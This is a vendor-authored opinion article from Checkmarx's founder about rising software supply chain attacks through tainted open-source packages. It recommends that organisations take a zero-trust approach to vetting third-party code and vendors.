Maty Siman at Checkmarx outlines techniques for mitigating the supply chain security and explores the open source threat
The SolarWinds breach, Codecov attack and Colonial Pipeline shutdown have more than one thing in common. Not only were they devastating and far reaching, but all came about as a result of insecure supply chains. Worryingly though, these aren’t the only supply chain attacks we’ve seen this year.
The rise in supply chain attacks is a trend we’re not likely to see slow down either: software and service providers have become common prey for hackers. In fact, according to Gartner, “by 2025, 45% of organisations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021”.
While the targets – businesses and suppliers within the supply chain of large public, private and governmental organisations – remain largely the same for hackers, attack vectors are changing, with cyber-criminals becoming more sophisticated in the ways they’re targeting organisations.
In the wake of this, and as businesses begin to look more closely at the overall security posture of their supply chains and third-party integrations, we’ll discuss these changing attack vectors more closely, as well as the mitigation processes needed to prevent attacks of this kind.
New attack vectors: what’s lurking within
Put simply, supply chain attacks often stem from malicious actors deliberately injecting hard-to-detect, tainted code into open-source packages, either commercial or available as open source. In fact, there are already a significant number of libraries which, despite being securely coded and elegantly implemented, are also deeply malicious.
With the ever growing popularity of open source projects, we see an increasingly common risk of threat actors seeding vulnerable code into open source packages – an issue organisations and development teams can’t afford to overlook. In fact, recent research found that nearly a fifth of all vulnerabilities within open source software were intentionally planted backdoors.
The issue? This planted code has been written to deliberately hide its intent, making it difficult for developers to truly understand whether they’re putting their organisation at risk by using it. Evaluating the risks is also a complex process with developers needing to assess what the code does when running it, and who created it in the first place.
To truly discover the intent behind the code, developers must look at who contributed to the code, what other packages they have created, and their overall online presence, as well as evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make.
Doing this for the hundreds of packages and contributors within a supply chain though is unsustainable, impractical, and also demands a set of capabilities many organisations simply don’t possess.
A new mindset: adopting a zero-trust approach
As previously mentioned, to avoid becoming either a victim or unwilling accomplice of a software supply chain attack, organisations need to carefully assess the software component used in their applications. While there are technology solutions on the market that can support with this risk analysis, development and security teams must cover the basics before employing these; specifically, the implementation of a zero-trust approach.
A strategic cyber-security model, zero-trust is the process of organisations essentially trusting nothing at face value, whether it’s inside or outside their network perimeter. By working on the premise that everything and everyone trying to access or connect to an organisation’s system is malicious, businesses can mitigate the risk of both attacks and vulnerabilities slipping through the cracks.
This is especially true when it comes to open source packages, and developers must be responsible for applying a zero-trust security mindset to external code packages being adopted into modern applications. Taking a critical eye to open source components and gaining visibility into the health, trustworthiness, provenance, and risk is essential in this effort.
As part of this, we would recommend CISOs take it upon themselves to understand how each vendor within their supply chain has protected themselves, specifically when it comes to securing the open source software they’re incorporating into their products.
Not only this though, the zero-trust mindset also lends itself to wider supply chain security. And, no vendor, no matter their size or reputation, should be allowed into a supply chain without the necessary checks being put in place first. Trust nothing and no one until the proper due diligence is performed.
The main priority: security
It’s inevitable that organisations will continue to use third-parties to provide necessary services and offerings, and developers will continue to use open source libraries and repositories to expedite their work and build more feature-packed applications. However, a step change needs to happen, with zero-trust at the forefront.
The risk of an attack or breach is far too high to not take supply chain security seriously, and everyone within a business and its partners – whether that’s IT teams, developers, or the C-Suite – must prioritise integral IT security practices across the board.
Alongside this, organisations shouldn’t be put off using open source. While there’s some risks to using them, as discussed within this piece, the openness of open source packages allows the community to review the code, build contributor score, and detect any issues quickly. This, alongside the overall benefits of open source still makes it a vital tool for developer teams.
By taking more rigorous steps to move beyond the mindset of inherent security trust however, the risks of threat actors successfully targeting and breaching your organisation, or a business within its supply chain, can be mitigated. Security must be the number one priority.
Maty Siman is founder and CTO of Checkmarx
Main image courtesy of iStockPhoto.com